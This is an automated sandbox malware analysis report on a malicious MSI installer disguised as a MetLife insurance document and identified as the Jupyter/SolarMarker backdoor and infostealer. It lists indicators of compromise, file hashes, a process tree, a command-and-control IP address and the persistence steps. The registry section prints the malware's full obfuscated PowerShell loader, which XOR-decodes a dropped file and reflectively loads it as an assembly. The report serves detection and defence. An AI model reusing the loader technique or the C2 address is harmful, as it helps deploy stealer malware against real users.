jupyter | 9f0ab558d73abbd9883c32a3eb93240a38b63aa97f5021a63da8602c39fe72ab

Analysis

max time kernel
136s
max time network
145s
platform
windows10_x64
resource
win10v20210408
submitted
16-09-2021 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Metlife-Disability-Waiver-Of-Premium-Benefit-Rider.msi

Score

10^/10

jupyter backdoor discovery stealer trojan

Malware Config

Extracted

Family

jupyter

Version

SP-11

http://37.120.237.251

Signatures

Jupyter Backdoor/Client Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/64-3214-0x0000000009790000-0x000000000979A000-memory.dmp	family_jupyter

Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
backdoor trojan stealer jupyter
Blocklisted process makes network request 3 IoCs

Processes:

msiexec.exepowershell.exe

flow pid process

2 568 msiexec.exe
4 568 msiexec.exe
13 64 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

MSI7DB2.tmpMSI7DB2.tmp

pid process

3168 MSI7DB2.tmp
372 MSI7DB2.tmp

flow	pid	process
2	568	msiexec.exe
4	568	msiexec.exe
13	64	powershell.exe

pid	process
3168	MSI7DB2.tmp
372	MSI7DB2.tmp

Drops startup file 1 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\miCroSoFt\WINDOwS\stARt MENU\PRogrAMs\staRtuP\aad8174b5ff4d3bc9e9443812d0b0.lnK	powershell.exe

Loads dropped DLL 12 IoCs

Processes:

MsiExec.exeMSI7DB2.tmp

pid	process
2972	MsiExec.exe
2972	MsiExec.exe
372	MSI7DB2.tmp
372	MSI7DB2.tmp
372	MSI7DB2.tmp
372	MSI7DB2.tmp
372	MSI7DB2.tmp
372	MSI7DB2.tmp
372	MSI7DB2.tmp
372	MSI7DB2.tmp
372	MSI7DB2.tmp
372	MSI7DB2.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe

Modifies registry class 7 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\pbncklnqks\shell\open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\pbncklnqks	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\pbncklnqks\shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\pbncklnqks\shell\open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\pbncklnqks\shell\open\command\ = "PoWERShEll -WiNdOwstyLe hiDDeN -eP BYPAss -coMMAND \"$a90dc61b8874eb94f196887b5dc01='XjFpcn5Ae2d5Zj40fmlLbll4aGtrQXJ+bG5WK29qeHNTQipxTCEyTGxEdnJXeDNyYDJzRjtaR2srLXcta0QtaDZnfWxHPnhgd0lkaUhyQFZrPD5AdVkmZl4xaHB8QGB7U0JeTXRDYl5PVXhzQHxDYFdAUyY4dV5Qc2JYXm50bXdAdTA0Z0B7cHMwQHxCNX5eUWZWKl5vNjlEQH55Z3FAU2NJSF4wY3t3';$aacf08db5c6491ba0455a2adeca33=[SySteM.Io.FiLE]::ReadALlBYTES('C:\\Users\\Admin\\AppData\\Roaming\\MIcROsOFT\\JzunQDpLwjfvZGPY\\UoYLDiSNdXQ.RePhxbJXNEYnkvmQ');fOR($a08fc4b3ab14b7a8dd0ccecc1a86a=0;$a08fc4b3ab14b7a8dd0ccecc1a86a -lT $aacf08db5c6491ba0455a2adeca33.COuNt;){foR($a642b630ebc413bd3c2e23e8fd42d=0;$a642b630ebc413bd3c2e23e8fd42d -lT $a90dc61b8874eb94f196887b5dc01.lEngth;$a642b630ebc413bd3c2e23e8fd42d++){$aacf08db5c6491ba0455a2adeca33[$a08fc4b3ab14b7a8dd0ccecc1a86a]=$aacf08db5c6491ba0455a2adeca33[$a08fc4b3ab14b7a8dd0ccecc1a86a] -bxOR $a90dc61b8874eb94f196887b5dc01[$a642b630ebc413bd3c2e23e8fd42d];$a08fc4b3ab14b7a8dd0ccecc1a86a++;if($a08fc4b3ab14b7a8dd0ccecc1a86a -GE $aacf08db5c6491ba0455a2adeca33.coUNT){$a642b630ebc413bd3c2e23e8fd42d=$a90dc61b8874eb94f196887b5dc01.LENgTh}}};[sYstEm.reFleCTion.ASSEmBLY]::loaD($aacf08db5c6491ba0455a2adeca33);[maRS.deIMOS]::InTerACt()\""	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\.etbinxrvln	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\.etbinxrvln\ = "pbncklnqks"	powershell.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

Processes:

powershell.exe

pid	process
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe
64	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	568	msiexec.exe
Token: SeIncreaseQuotaPrivilege	568	msiexec.exe
Token: SeSecurityPrivilege	3572	msiexec.exe
Token: SeCreateTokenPrivilege	568	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	568	msiexec.exe
Token: SeLockMemoryPrivilege	568	msiexec.exe
Token: SeIncreaseQuotaPrivilege	568	msiexec.exe
Token: SeMachineAccountPrivilege	568	msiexec.exe
Token: SeTcbPrivilege	568	msiexec.exe
Token: SeSecurityPrivilege	568	msiexec.exe
Token: SeTakeOwnershipPrivilege	568	msiexec.exe
Token: SeLoadDriverPrivilege	568	msiexec.exe
Token: SeSystemProfilePrivilege	568	msiexec.exe
Token: SeSystemtimePrivilege	568	msiexec.exe
Token: SeProfSingleProcessPrivilege	568	msiexec.exe
Token: SeIncBasePriorityPrivilege	568	msiexec.exe
Token: SeCreatePagefilePrivilege	568	msiexec.exe
Token: SeCreatePermanentPrivilege	568	msiexec.exe
Token: SeBackupPrivilege	568	msiexec.exe
Token: SeRestorePrivilege	568	msiexec.exe
Token: SeShutdownPrivilege	568	msiexec.exe
Token: SeDebugPrivilege	568	msiexec.exe
Token: SeAuditPrivilege	568	msiexec.exe
Token: SeSystemEnvironmentPrivilege	568	msiexec.exe
Token: SeChangeNotifyPrivilege	568	msiexec.exe
Token: SeRemoteShutdownPrivilege	568	msiexec.exe
Token: SeUndockPrivilege	568	msiexec.exe
Token: SeSyncAgentPrivilege	568	msiexec.exe
Token: SeEnableDelegationPrivilege	568	msiexec.exe
Token: SeManageVolumePrivilege	568	msiexec.exe
Token: SeImpersonatePrivilege	568	msiexec.exe
Token: SeCreateGlobalPrivilege	568	msiexec.exe
Token: SeCreateTokenPrivilege	568	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	568	msiexec.exe
Token: SeLockMemoryPrivilege	568	msiexec.exe
Token: SeIncreaseQuotaPrivilege	568	msiexec.exe
Token: SeMachineAccountPrivilege	568	msiexec.exe
Token: SeTcbPrivilege	568	msiexec.exe
Token: SeSecurityPrivilege	568	msiexec.exe
Token: SeTakeOwnershipPrivilege	568	msiexec.exe
Token: SeLoadDriverPrivilege	568	msiexec.exe
Token: SeSystemProfilePrivilege	568	msiexec.exe
Token: SeSystemtimePrivilege	568	msiexec.exe
Token: SeProfSingleProcessPrivilege	568	msiexec.exe
Token: SeIncBasePriorityPrivilege	568	msiexec.exe
Token: SeCreatePagefilePrivilege	568	msiexec.exe
Token: SeCreatePermanentPrivilege	568	msiexec.exe
Token: SeBackupPrivilege	568	msiexec.exe
Token: SeRestorePrivilege	568	msiexec.exe
Token: SeShutdownPrivilege	568	msiexec.exe
Token: SeDebugPrivilege	568	msiexec.exe
Token: SeAuditPrivilege	568	msiexec.exe
Token: SeSystemEnvironmentPrivilege	568	msiexec.exe
Token: SeChangeNotifyPrivilege	568	msiexec.exe
Token: SeRemoteShutdownPrivilege	568	msiexec.exe
Token: SeUndockPrivilege	568	msiexec.exe
Token: SeSyncAgentPrivilege	568	msiexec.exe
Token: SeEnableDelegationPrivilege	568	msiexec.exe
Token: SeManageVolumePrivilege	568	msiexec.exe
Token: SeImpersonatePrivilege	568	msiexec.exe
Token: SeCreateGlobalPrivilege	568	msiexec.exe
Token: SeCreateTokenPrivilege	568	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	568	msiexec.exe
Token: SeLockMemoryPrivilege	568	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

msiexec.exe

pid process

568 msiexec.exe

pid	process
568	msiexec.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

msiexec.exemsiexec.exeMsiExec.exeMSI7DB2.tmp

description	pid	process	target process
PID 3572 wrote to memory of 2972	3572	msiexec.exe	MsiExec.exe
PID 3572 wrote to memory of 2972	3572	msiexec.exe	MsiExec.exe
PID 3572 wrote to memory of 2972	3572	msiexec.exe	MsiExec.exe
PID 568 wrote to memory of 3168	568	msiexec.exe	MSI7DB2.tmp
PID 568 wrote to memory of 3168	568	msiexec.exe	MSI7DB2.tmp
PID 568 wrote to memory of 3168	568	msiexec.exe	MSI7DB2.tmp
PID 2972 wrote to memory of 64	2972	MsiExec.exe	powershell.exe
PID 2972 wrote to memory of 64	2972	MsiExec.exe	powershell.exe
PID 2972 wrote to memory of 64	2972	MsiExec.exe	powershell.exe
PID 3168 wrote to memory of 372	3168	MSI7DB2.tmp	MSI7DB2.tmp
PID 3168 wrote to memory of 372	3168	MSI7DB2.tmp	MSI7DB2.tmp
PID 3168 wrote to memory of 372	3168	MSI7DB2.tmp	MSI7DB2.tmp

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Metlife-Disability-Waiver-Of-Premium-Benefit-Rider.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:568
- C:\Users\Admin\AppData\Local\Temp\MSI7DB2.tmp
  "C:\Users\Admin\AppData\Local\Temp\MSI7DB2.tmp"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3168
- - C:\Windows\Temp\{6727432A-0540-4874-A12F-7D896F79E505}\.cr\MSI7DB2.tmp
    "C:\Windows\Temp\{6727432A-0540-4874-A12F-7D896F79E505}\.cr\MSI7DB2.tmp" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\MSI7DB2.tmp" -burn.filehandle.attached=524 -burn.filehandle.self=532
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:372

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3572
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6D51198FFA889AEE833D8ABABA39C830 C
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7E12.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7DE0.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7DE1.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7DE2.txt" -propSep " :<->: " -testPrefix "_testValue."
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:64

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MSI78B0.tmp

MD5
07ce413b1af6342187514871dc112c74

SHA1
8008f8bfeae99918b6323a3d1270dea63b3a8394

SHA256
0ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46

SHA512
27df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI7DB2.tmp

MD5
044a5d8e2f1356de889aedb11fdcc679

SHA1
4e8416eb12d209509d49998ebe714612709eb4d6

SHA256
e4492ccb97078cc32ee4437404ce04f4404884800a81fb34243d0a64936f82d7

SHA512
3cb6beaf46ec6ca3aa5a645b51b1df7a26826d8e65eb8f6cd1be63488f7a372c1e7e266f2950489a3ae8b3c6ca60d72f25504e4942e096c5c2045177557c79b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI7DB2.tmp

MD5
044a5d8e2f1356de889aedb11fdcc679

SHA1
4e8416eb12d209509d49998ebe714612709eb4d6

SHA256
e4492ccb97078cc32ee4437404ce04f4404884800a81fb34243d0a64936f82d7

SHA512
3cb6beaf46ec6ca3aa5a645b51b1df7a26826d8e65eb8f6cd1be63488f7a372c1e7e266f2950489a3ae8b3c6ca60d72f25504e4942e096c5c2045177557c79b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI7DC3.tmp

MD5
c26c68e4a79fd2629714b17514411c40

SHA1
00138d8edea0918c4476da303415be399cf704c6

SHA256
55434961c0b4bed88ae6bfe6e0e61a3a3dcc392858f0e53c6c14c272200203ed

SHA512
6fc8028e6e52b6c9e74ac3ea6d19ed750047d46b7e4021d46e581b58367ffc11fb13b696dfa30a15305e94098a7fd12051ee37d32df91ef2ae1e2d9c642b02ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\pss7E12.ps1

MD5
0c95bc11cfca37f84a19de0529377e13

SHA1
41f409dbbab04ef35c4f6489af6f85fceb9c501a

SHA256
88748aae11029228d84aef0855f4bc084dfd70450db1f7029746d8bc85182f93

SHA512
8a52f3c40440e3129a367609ee4b6e9e98aa62edec48592be03bad1aadcd389e2e58e095f4ea3d6f9cb458aa7101fcb5afdff66658885bfa0634c74c086db568

Download Submit
C:\Users\Admin\AppData\Local\Temp\scr7DE1.ps1

MD5
6a251db4fad4a2248b0cc2e74461b07c

SHA1
190aab8b9badd7a4fc75a1b925f0e1135af44230

SHA256
e34af1b6edf33b155ca9854d084577c30e1bc9d96eee10014277a0e55a47beef

SHA512
b37ba8374dc9acf92520142e0c71f48c1fc94199ef85749d08d0b9e0367f78719dc1ce3786b05a2068bc79cf76df3283a8e38e1f06f6185516adfd6e43796b13

Download Submit
C:\Windows\Temp\{6727432A-0540-4874-A12F-7D896F79E505}\.cr\MSI7DB2.tmp

MD5
044a5d8e2f1356de889aedb11fdcc679

SHA1
4e8416eb12d209509d49998ebe714612709eb4d6

SHA256
e4492ccb97078cc32ee4437404ce04f4404884800a81fb34243d0a64936f82d7

SHA512
3cb6beaf46ec6ca3aa5a645b51b1df7a26826d8e65eb8f6cd1be63488f7a372c1e7e266f2950489a3ae8b3c6ca60d72f25504e4942e096c5c2045177557c79b9

Download Submit
C:\Windows\Temp\{6727432A-0540-4874-A12F-7D896F79E505}\.cr\MSI7DB2.tmp

MD5
044a5d8e2f1356de889aedb11fdcc679

SHA1
4e8416eb12d209509d49998ebe714612709eb4d6

SHA256
e4492ccb97078cc32ee4437404ce04f4404884800a81fb34243d0a64936f82d7

SHA512
3cb6beaf46ec6ca3aa5a645b51b1df7a26826d8e65eb8f6cd1be63488f7a372c1e7e266f2950489a3ae8b3c6ca60d72f25504e4942e096c5c2045177557c79b9

Download Submit
\Users\Admin\AppData\Local\Temp\MSI78B0.tmp

MD5
07ce413b1af6342187514871dc112c74

SHA1
8008f8bfeae99918b6323a3d1270dea63b3a8394

SHA256
0ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46

SHA512
27df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5

Download Submit
\Users\Admin\AppData\Local\Temp\MSI7DC3.tmp

MD5
c26c68e4a79fd2629714b17514411c40

SHA1
00138d8edea0918c4476da303415be399cf704c6

SHA256
55434961c0b4bed88ae6bfe6e0e61a3a3dcc392858f0e53c6c14c272200203ed

SHA512
6fc8028e6e52b6c9e74ac3ea6d19ed750047d46b7e4021d46e581b58367ffc11fb13b696dfa30a15305e94098a7fd12051ee37d32df91ef2ae1e2d9c642b02ea

Download Submit
\Windows\Temp\{A9D63059-9123-4339-BA42-A5F36D61FA28}\.ba\BootstrapperCore.dll

MD5
c4f7146ddc56763ccdb1cb3c09478708

SHA1
bca088ab33cfb69adeae11a272e9c8a83f39a8c9

SHA256
886cb2a994461f091752fc7b21e3143c212efd8841c757909e74ac32761880da

SHA512
df2ca029e95f80fc5870e541db8b1d5a03266307bb5f7680ad630868a9a3c584b3a702fbec09c26fef7287c99f5d9d1f59cd59b74dcf740c9a8e7508e07d18b5

Download Submit
\Windows\Temp\{A9D63059-9123-4339-BA42-A5F36D61FA28}\.ba\BootstrapperCore.dll

MD5
c4f7146ddc56763ccdb1cb3c09478708

SHA1
bca088ab33cfb69adeae11a272e9c8a83f39a8c9

SHA256
886cb2a994461f091752fc7b21e3143c212efd8841c757909e74ac32761880da

SHA512
df2ca029e95f80fc5870e541db8b1d5a03266307bb5f7680ad630868a9a3c584b3a702fbec09c26fef7287c99f5d9d1f59cd59b74dcf740c9a8e7508e07d18b5

Download Submit
\Windows\Temp\{A9D63059-9123-4339-BA42-A5F36D61FA28}\.ba\GalaSoft.MvvmLight.WPF4.dll

MD5
1e40431b501d55fe8ba59cabb3ce5c17

SHA1
b8aef0f6829345d844960c3eaf96c41f76142f6c

SHA256
92ef1bdf8c8140e34e5ae1eb8d9b7afba9921e5ada6317c6cdd0da2712f7e000

SHA512
2ab5d887e717add46959a7193cbf1dbf73f2792130025e5712ae76058ce5923be8afdf3ed8d11ea6859b13126f88bb9e1099741c799ca90e3f7713955dd9638d

Download Submit
\Windows\Temp\{A9D63059-9123-4339-BA42-A5F36D61FA28}\.ba\GalaSoft.MvvmLight.WPF4.dll

MD5
1e40431b501d55fe8ba59cabb3ce5c17

SHA1
b8aef0f6829345d844960c3eaf96c41f76142f6c

SHA256
92ef1bdf8c8140e34e5ae1eb8d9b7afba9921e5ada6317c6cdd0da2712f7e000

SHA512
2ab5d887e717add46959a7193cbf1dbf73f2792130025e5712ae76058ce5923be8afdf3ed8d11ea6859b13126f88bb9e1099741c799ca90e3f7713955dd9638d

Download Submit
\Windows\Temp\{A9D63059-9123-4339-BA42-A5F36D61FA28}\.ba\NitroBA.dll

MD5
6726d4b46346ef40dd3ea4376ae7d259

SHA1
ffdaa10e1e3d1c7d7411f799a0889ce66014bc29

SHA256
3e96b189fa7a160396742cdc93564dfce3ad3993a3e21118cf9114c8cb45e963

SHA512
cd2a68f1ce4bc161b26466fa8f472803d7a10b339dff6c599e64863236ef59d9a0ed1b2f4168f8557b35d81d92edccdfd9d313096a88415838b6351af1ae249a

Download Submit
\Windows\Temp\{A9D63059-9123-4339-BA42-A5F36D61FA28}\.ba\NitroBA.dll

MD5
6726d4b46346ef40dd3ea4376ae7d259

SHA1
ffdaa10e1e3d1c7d7411f799a0889ce66014bc29

SHA256
3e96b189fa7a160396742cdc93564dfce3ad3993a3e21118cf9114c8cb45e963

SHA512
cd2a68f1ce4bc161b26466fa8f472803d7a10b339dff6c599e64863236ef59d9a0ed1b2f4168f8557b35d81d92edccdfd9d313096a88415838b6351af1ae249a

Download Submit
\Windows\Temp\{A9D63059-9123-4339-BA42-A5F36D61FA28}\.ba\PageTransitions.dll

MD5
ad69d408b05b98180b25d23b0a790f01

SHA1
5fdbdae2979685db500d2b031e2a430ce16e592e

SHA256
14090b63240c63bfe118a24b6f0112095f331ac46819f6f4ab62d8e9bbe4c646

SHA512
12323f7190fd785277965996cffe141a5b2d5b11679961db6aa6744b8157df7f9bd7b5b935d3ca2a7e0be7ca5f0f60fd8885b94ae7cd70aea1572e90a2599eac

Download Submit
\Windows\Temp\{A9D63059-9123-4339-BA42-A5F36D61FA28}\.ba\PageTransitions.dll

MD5
ad69d408b05b98180b25d23b0a790f01

SHA1
5fdbdae2979685db500d2b031e2a430ce16e592e

SHA256
14090b63240c63bfe118a24b6f0112095f331ac46819f6f4ab62d8e9bbe4c646

SHA512
12323f7190fd785277965996cffe141a5b2d5b11679961db6aa6744b8157df7f9bd7b5b935d3ca2a7e0be7ca5f0f60fd8885b94ae7cd70aea1572e90a2599eac

Download Submit
\Windows\Temp\{A9D63059-9123-4339-BA42-A5F36D61FA28}\.ba\mbahost.dll

MD5
d7c697ceb6f40ce91dabfcbe8df08e22

SHA1
49cd0213a1655dcdb493668083ab2d7f55135381

SHA256
b925d9d3e1e2c49bf05a1b0713e2750ee6e0c43c7adc9d3c3a1b9fb8c557c3df

SHA512
22ca87979ca68f10b5fda64c27913d0f2a12c359b04e4a6caa3645303fbd47cd598c805fd9a43c8f3e0934e9d2db85f7a4e1eff26cb33d233efc05ee2613cfc1

Download Submit
\Windows\Temp\{A9D63059-9123-4339-BA42-A5F36D61FA28}\.ba\metrics.dll

MD5
aed8280e90f672f631d2aedebd6452bf

SHA1
390b96ce6b4b1a47c12d8932c5e8da6e51fdd38a

SHA256
a82332e0a9c9cee34f9a46d5e984901fa57a011f54e7b37b9716acf834746ced

SHA512
23a223fc4da00038ff6b584f0a2a4186f49eaf4d8cb28dfdfa795048a4a977aa39848cb83bbfd8f0555412fd04c802b122267266e33a5ddc49d3e0ff1e2eca4f

Download Submit
memory/64-160-0x0000000008530000-0x0000000008531000-memory.dmp

Filesize
4KB

Download
memory/64-174-0x00000000087C0000-0x00000000087C1000-memory.dmp

Filesize
4KB

Download
memory/64-138-0x0000000004D22000-0x0000000004D23000-memory.dmp

Filesize
4KB

Download
memory/64-147-0x0000000007A90000-0x0000000007A91000-memory.dmp

Filesize
4KB

Download
memory/64-3214-0x0000000009790000-0x000000000979A000-memory.dmp

Filesize
40KB

Download
memory/64-135-0x0000000007380000-0x0000000007381000-memory.dmp

Filesize
4KB

Download
memory/64-134-0x0000000004CD0000-0x0000000004CD1000-memory.dmp

Filesize
4KB

Download
memory/64-201-0x0000000004D23000-0x0000000004D24000-memory.dmp

Filesize
4KB

Download
memory/64-152-0x0000000007B30000-0x0000000007B31000-memory.dmp

Filesize
4KB

Download
memory/64-182-0x000000000A620000-0x000000000A621000-memory.dmp

Filesize
4KB

Download
memory/64-176-0x0000000009AA0000-0x0000000009AA1000-memory.dmp

Filesize
4KB

Download
memory/64-156-0x0000000007E30000-0x0000000007E31000-memory.dmp

Filesize
4KB

Download
memory/64-175-0x0000000009250000-0x0000000009251000-memory.dmp

Filesize
4KB

Download
memory/64-157-0x0000000007CC0000-0x0000000007CC1000-memory.dmp

Filesize
4KB

Download
memory/64-158-0x0000000008460000-0x0000000008461000-memory.dmp

Filesize
4KB

Download
memory/64-137-0x0000000004D20000-0x0000000004D21000-memory.dmp

Filesize
4KB

Download
memory/64-173-0x0000000009500000-0x0000000009501000-memory.dmp

Filesize
4KB

Download
memory/64-151-0x0000000007D10000-0x0000000007D11000-memory.dmp

Filesize
4KB

Download
memory/64-128-0x0000000000000000-mapping.dmp

Download
memory/372-150-0x0000000006940000-0x0000000006941000-memory.dmp

Filesize
4KB

Download
memory/372-154-0x0000000006961000-0x0000000006962000-memory.dmp

Filesize
4KB

Download
memory/372-166-0x0000000006967000-0x0000000006968000-memory.dmp

Filesize
4KB

Download
memory/372-155-0x0000000006963000-0x0000000006964000-memory.dmp

Filesize
4KB

Download
memory/372-170-0x00000000074A0000-0x00000000074A1000-memory.dmp

Filesize
4KB

Download
memory/372-165-0x0000000006964000-0x0000000006965000-memory.dmp

Filesize
4KB

Download
memory/372-129-0x0000000000000000-mapping.dmp

Download
memory/372-153-0x0000000006960000-0x0000000006961000-memory.dmp

Filesize
4KB

Download
memory/372-145-0x0000000006CE0000-0x0000000006CE1000-memory.dmp

Filesize
4KB

Download
memory/372-177-0x0000000009F10000-0x0000000009F11000-memory.dmp

Filesize
4KB

Download
memory/372-141-0x0000000004600000-0x0000000004601000-memory.dmp

Filesize
4KB

Download
memory/372-163-0x0000000007300000-0x0000000007301000-memory.dmp

Filesize
4KB

Download
memory/372-200-0x0000000006968000-0x0000000006969000-memory.dmp

Filesize
4KB

Download
memory/2972-118-0x0000000000000000-mapping.dmp

Download
memory/3168-125-0x0000000000000000-mapping.dmp

Download